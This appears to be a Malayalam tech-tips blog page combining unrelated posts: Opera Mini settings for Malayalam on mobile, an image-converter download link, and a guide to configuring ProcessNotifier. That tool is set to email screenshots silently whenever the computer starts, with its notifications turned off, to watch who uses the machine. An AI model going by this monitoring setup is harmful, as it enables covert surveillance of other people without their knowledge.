മൊബൈലില്‍ മലയാളം വായിയ്ക്കാനും എഴുതാനും കഴിയുക വിദൂരസ്വപ്നമായിരുന്നു, ഈയടുത്തുവരെ. ഏറെക്കാലത്തെ അലച്ചിലിനു ശേഷം ഓണ്‍ലൈനില്‍ മലയാളം എഴുതാനും വായിയ്ക്കാനും കഴിയുന്ന ചില ടെക്നിക്കുകള്‍ പലയിടത്തു നിന്നുമായി ലഭിയ്ക്കുകയുണ്ടായി. അവ ഇവിടെ പങ്കുവെയ്ക്കുന്നു. ശ്രദ്ധിയ്ക് കുക, ഈ അഭ്യാസങ്ങള്‍ മുഴുവന്‍ “Opera Mini” എന്ന മൊബൈല്‍ ബ്രൌസറിന്റെ സഹായത്തോടെ ആണ് ചെയ്യുന്നത്. മറ്റു ബ്രൌസറുകള്‍ ഇതിനു പര്യാപ്തമാണെന്ന് തോന്നുന്നില്ല (കൃത്യമായി അറിയില്ല. എന്നാല്‍ ആപ്പിളിന്റെ Safari ബ്രൌസറില്‍ മൊബൈല്‍ മലയാളം വായിയ്ക്കാന്‍ കഴിയുന്നുണ്ടെന്ന് ഒരു സുഹൃത്ത് പറഞ്ഞു). ആയതിനാല്‍ നിലവില്‍ Opera Mini നിങ്ങളുടെ മൊബൈലില്‍ ഇല്ലായെങ്കില്‍ ഡൌണ്‍ലോഡ് ചെയ്ത് ഇന്‍സ്റ്റാള്‍ ചെയ്യണം.ആന്‍ഡ്രോയിഡ് മൊബൈലുകള്‍ക്ക്, “മാര്‍ക്കറ്റി“ല്‍ സെര്‍ച്ച് ചെയ്താല്‍ Opera Mini അനായാസം ലഭിയ്ക്കും. അല്ലാത്തവ www.m.opera.com സൈറ് റില്‍ പോയി ഡൌണ്‍ലോഡ് ചെയ്യുക.ഇനി:1. OPERA MINI ഇന്‍സ്റ്റാള്‍ ചെയ്യുക.2. OPERA MINI ഓപണ്‍ ചെയ്യുക. അഡ്രസ് ബാറില്‍ config: എന്നു ടൈപ്പ് ചെയ്യുക. ( “ : “ കോളണ്‍ ചിഹ്നം ഇടാന്‍ മറക്കരുത്. )3. ഇപ്പോള്‍ POWER USER SETTINGS എന്നൊരു പേജ് കിട്ടും. അത് താഴേയ്ക്ക് സ്ക്രോള്‍ ചെയ്യുക.Use bitmap fonts for complex scripts എന്ന സെറ്റിങ്ങില്‍ എത്തുക. അവിടെ No എന്നു കാണുന്നത് Yes ആക്കുക. Save ചെയ്യുക.(ഒരു പക്ഷെ config: എന്നു ടൈപ്പു ചെയ്താല്‍ ചിലപ്പോള്‍ error കാണിച്ചേക്കാം. അപ്പോള്‍ opera:config എന്നു ടൈപ്പ് ചെയ്ത് ശ്രമിയ്ക്കുക. എന്നിട്ടും നടന്നില്ലെങ്കില്‍ ഓപറാ ക്ലോസ് ചെയ്ത് വീണ്ടും ശ്രമിയ്ക്കുക. അല്ലെങ്കില്‍ Uninstall ചെയ്ത് വീണ്ടും ഇന്‍സ്റ്റാള്‍ ചെയ്യുക. ഞാന്‍ കുറേ പ്രാവശ്യം ശ്രമിച്ചിട്ടാണ് ശരിയായത്)ഇനി നിങ്ങളുടെ ബ്ലോഗ്, ഫേസ്ബുക്ക്, വിക്കി, മലയാളം യൂണിക്കോഡ് സൈറ്റുകള്‍ തുറന്നു നോക്കൂ..ചില മൊബൈലുകളില്‍ ഫേസ്ബുക്ക്, ഓര്‍ക്കുട്ട്, ജിമെയില്‍ ഇവയൊക്കെ നേരത്തെ തന്നെ ഇന്‍സ്റ്റാള്‍ ചെയ്തിരിയ്ക്കും. അവയിലൊന്നും മലയാളം കിട്ടില്ല. അവ സൈന്‍ ഔട്ട് ചെയ്തിട്ട്, ഓപ്പറയില്‍ ലോഗിന്‍ ചെയ്യുക.മലയാളം എഴുതാന്‍ :കമ്പ്യൂട്ടറില്‍ “കീമാന്‍“ ഉപയോഗിച്ച് മലയാളം എഴുതുംപോലെ അനായാസമാണ് ഇതെന്ന് വിചാരിയ്ക്കരുത്. അത്ര അത്യാവശ്യമാണെങ്കിലോ അല്ലെങ്കില്‍ മിനക്കെടാന്‍ സമയമുണ്ടെങ്കിലോ മാത്രം ശ്രമിയ്ക്കുക. ഇത് ഓണ്‍ലൈനില്‍ മാത്രമേ സാധ്യമാകൂ.സമ്മതമെങ്കില്‍ നിങ്ങളുടെ മൊബൈലില്‍ ടെക്സ്റ്റുകളുടെ CUT / COPY / PASTE ഓപഷ്നുകള്‍ എങ്ങനെയാണ് ചെയ്യുന്നതെന്ന് കണ്ടുപിടിയ്ക്കുക. നിങ്ങളുടെ മൊബൈലിന്റേത് കണ്ടെത്തിയാല്‍ ഇനി “എഴുത്തി“ലേയ്ക്ക് കടക്കാം.1. നിങ്ങളുടെ OPERA MINI യില്‍ ശ്രദ്ധാപൂര്‍വം http:// malayalam.keralamla.com/mobile/ index.php ഈ അഡ്രസ് തെറ്റാതെ ടൈപ്പ് ചെയ്ത് സൈറ്റിലേയ്ക്ക് പോകുക. (ഈ പേജ് ബുക്ക്മാര്‍ക്ക് ചെയ്തു വച്ചോളു.)2. ഇപ്പോള്‍ ലഭിയ്ക്കുന്ന പേജില്‍ “Enter Text to be transliterated“ എന്നതിനു താഴെയുള്ള ടെക്‍സ്റ്റ് ബോക്സില്‍ മംഗ്ലീഷ് വാക്ക് ടൈപ്പ് ചെയ്യുക. ലിപി വിന്യാസം “കീമാന്‍“ പോലെ തന്നെ. ഇനി “Submit“ ബട്ടണ്‍ അമര്‍ത്തുക.3. അല്പസമയത്തിനകം ടെക്സ്റ്റ് ബോക്സിനു മുകളിലായി നിങ്ങള്‍ ടൈപ്പ് ചെയ്ത ടെക്സ്റ്റ് മലയാളത്തില്‍ കാണപ്പെടും.4. ടെക്സ്റ്റ് ബോക്സിനു താഴെയായി “Get Text“ എന്നു കാണുന്ന ബട്ടണ്‍ അമര്‍ത്തുക. അല്പസമയത്തിനം ആ ബോക്സില്‍ മലയാളം ടെക്സ്റ്റ് കാണപ്പെടും, എന്നാല്‍ ഏതാനും ചതുരകട്ടകളായിട്ടാണെന്നു മാത്രം. സാരമില്ല.5. ഇനി സെലെക്ട് ചെയ്ത് നിങ്ങളുടെ മൊബൈലിന്റെ CUT / COPY ഓപ്ഷന്‍ ഉപയോഗിച്ച് കട്ടോ കോപ്പിയോ ചെയ്യുക.6. ഓപറയിലെ മറ്റൊരു വിന്‍ഡോയില്‍ മലയാളം എഴുതേണ്ട സൈറ്റ് തുറക്കുക. അവിടെ ആവശ്യമായിടത്ത് പേസ്റ്റ് ചെയ്യുക.ശ്രദ്ധിയ്ക്കുക, ഓരോ വാക്കായിട്ടുമാത്രമേ ട്രാന്‍സ്‌ലിറ്റെറേഷന്‍ സാധിയ്ക്കൂ. ആയതിനാല്‍ മലയാളം എഴുതേണ്ട സൈറ്റും ട്രാന്‍സ്‌ലിറ്റെറേഷന്‍സൈറ്റും തുറന്നു വയ്ക്കുക. ഓരോ പ്രാവശ്യവും മാറി മാറി ടോഗിള്‍ ചെയ്യുക. QWERTY കീപാഡോ ടച്ച് സ്ക്രീനോ ഉള്ള മൊബൈലുകളില്‍ ടൈപ്പിങ്ങ് അത്ര വിഷമകരമായിരിയ്ക്കില്ല. അല്ലാത്തവയില്‍ ഈ പരിപാടി അത്ര സുഖകരമാണെന്ന്തോന്നുന്നില്ല. എന്തായാലും ശ്രമിച്ചു നോക്കൂ...
വാട്ടര്‍ മാര്‍ക്ക് ആട് ചെയ്യാം
ഇതൊരു സാധാരണ സോഫ്റ്റ് വേര്‍ ആണ് , ഇതില്‍ പുതുമ എന്ന് പറയാന്‍ മറ്റുള്ള ആറ് സോഫ്റ്റ് വേരില്‍ ചെയ്യുന്ന കാര്യങ്ങള്‍ ഈ ഒറ്റ സോഫ്റ്റ് വെരിലൂടെ ചെയ്യാം ,ഫോര്‍മാറ്റ് ചേഞ്ച് ചെയ്യാം , വാട്ടര്‍ മാര്‍ക്ക് ആട് ചെയ്യാം , പിക്ചര്‍ റീ സിസ് ചെയ്യാം, റീ നെയിം ചെയ്യാം ,,,, ഉപയോകിക്കാന്‍ വളരെ ഈസിയാണ്
ഇത് വേണ്ടവര്‍ ഇവിടെ ക്ലിക്ക് ചെയ്യുക http://www.batchimageconverter.com/download/AnyPicImageResizerPro.exe
സോഫ്റ്റ് വെയര്‍ ഇല്ലാതെ പാസ്സ് വേഡ് വച്ചു മാത്രം തുറക്കാവുന്ന ഫോള്‍ഡറുകള്‍ നിങ്ങള്‍ക്കും നിര്‍മ്മിക്കാം
ഞാന്‍ നല്‍കുന്ന ഈ കോഡ് ആദ്യം തെറ്റാതെ തന്നെ കോപ്പി ചെയ്തു നോട്ട് പാഡ് ഓപ്പണ്‍ ആക്കി പേസ്റ്റ് ചെയ്യുക
നമ്മുടെ സിസ്റ്റം മറ്റുള്ളവര്‍ ഉപയോഗിക്കുന്നുണ്ടോ എന്നറിയാം
ആദ്യം ഇവിടെ ക്ലിക്ക് ചെയ്തു ഈ ചെറിയ പ്രോഗ്രാം ഡൌണ്‍ ലോഡ് ചെയ്യുക,ഡൌണ്‍ ലോഡ് ചെയ്ത സിപ് ഫയല്‍ എക്സ്ട്രാക്ട് ചെയ്താല്‍ x86 ,x64 എന്നീ രണ്ടു ഫോള്‍ഡര്‍ കാണാന്‍ ആവും, അതില്‍ നിന്നും നിങ്ങളുടെ സിസ്റ്റം 32,64 BIT എന്നിവയ്ക്കനുസരിച്ചു 32BIT നു x86 എന്ന ഫോള്‍ഡറും 64BIT നു x64 എന്ന ഫോള്‍ഡറും ( ഏതെങ്കിലും ഒന്നു മാത്രം) ഓപ്പണ്‍ ആക്കുക, അതില്‍ ProcessNotifier.exe എന്ന ഫയല്‍ ഡബ്ബിള്‍ ക്ലിക്ക് ചെയ്യുക,എന്നിട്ടത് സ്റ്റാര്‍ട്ട് അപ്പിലേക്ക് ചേര്‍ക്കുക
ഇനി താഴെ സിസ്റ്റത്തില്‍ സമയം കാണിക്കുന്നതിനടുത്ത് നോക്കിയാല്‍ ഒരു പുതിയ ഐക്കണ്‍ കാണാന്‍ ആവും,അതില്‍ റൈറ്റ് ക്ലിക്ക് ചെയ്യുക , അപ്പോള്‍ ഇതു പോലെ കാണാന്‍ ആവും.
ഈ മെയില്‍ സെറ്റിങ്ങ്സ് എന്നതില്‍ SMTP ക്ലിക്ക് ചെയ്യുക,
അതില്‍ നിങ്ങളുടെ ഒരു ജീ മെയില്‍ ഐഡിയും പാസ്സ് വേഡും നല്‍കുക,SMTP Server എന്നിടത്ത് smtp.googlemail.com എന്നു തന്നെ നല്‍കുക
Message എന്നതില്‍ Send to email address എന്നതില്‍ അതേ ഈ മെയില്‍ അഡ്ഡ്രസ്സ് തന്നെ നല്‍കുക,സേവ് ചെയ്യുക
ഇനി വീണ്ടും താഴെ ഐക്കണില്‍ ക്ലിക്ക് ചെയ്തു Process to monitor എന്നതു എടുക്കുക
താഴെ സ്ക്രീന്‍ ഷോട്ടില്‍ തന്നിരിക്കുന്ന പോലെ തന്നെ ഒരു പ്രോഗ്രാമിന്റെ പേരു നിങ്ങളുടെ പേരു.exe എന്ന്‍ നല്‍കുക ഉദാഹരണം (sayed.exe), നോട്ടി ഫൈ എന്നതില്‍ നോട്ട് ഫൌണ്ട് എന്നാക്കുക, ശേഷം ആഡ് കൊടുക്കുക്ക, അതു സെലക്ട് ചെയ്ത ശേഷം സേവ് ചെയ്യുക
ഇത്രയേ വേണ്ടു , ഇനി നിങ്ങളുടെ സിസ്റ്റം ഓണ്‍ ആക്കിയാല്‍ അപ്പോള്‍ തന്നെ സ്ക്രീന്‍ ഷോട്ട് നിങ്ങള്‍ക്കു മെയില്‍ ആയി ലഭിച്ചു കൊണ്ടിരിക്കും, വേണമെങ്കില്‍ എത്ര സമയം കൂടുംബോള്‍ മെയിലുകള്‍ തുടര്‍ച്ചയായി ലഭിക്കണം എന്നും സെറ്റ് ചെയ്യാം
ശ്രദ്ധിക്കുക : ഇതു വര്‍ക്കിങ്ങാവാന്‍ സിസ്റ്റം ഓണ്‍ ആവുംബോള്‍ തനിയെ ഓണ്‍ ആകുന്ന ഇന്റെര്‍നെറ്റ് കണക്ഷന്‍ ആണു നല്ലതു,കൂടാതെ ഈ നോട്ടിഫിക്കേഷനുകള്‍ ടിക്ക് മാര്‍ക്ക് ഒഴിവാക്കിയിടുകയും വേണം,
അല്ലെങ്കില്‍ ഓരോ മെയില്‍ പോകുന്നതിനും നോട്ടിഫിക്കേഷന്‍ കാണിക്കും
Subscribe to:
Posts (Atom)